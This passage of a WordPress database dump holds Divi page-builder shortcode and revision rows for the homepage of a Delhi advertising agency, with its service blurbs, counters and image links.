button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 16:50:14','2020-08-07 16:50:14','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(507,1,'2020-08-07 16:58:44','2020-08-07 16:58:44','We are the best creative advertising agency in Delhi-India','Why-we','','inherit','open','closed','','why-we-2','','','2021-03-18 06:17:02','2021-03-18 06:17:02','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg',0,'attachment','image/jpeg',0),(508,1,'2020-08-07 16:59:31','2020-08-07 16:59:31','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"61px|||||\" custom_margin_tablet=\"\" custom_margin_phone=\"0px||||false|false\" custom_margin_last_edited=\"on|phone\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" 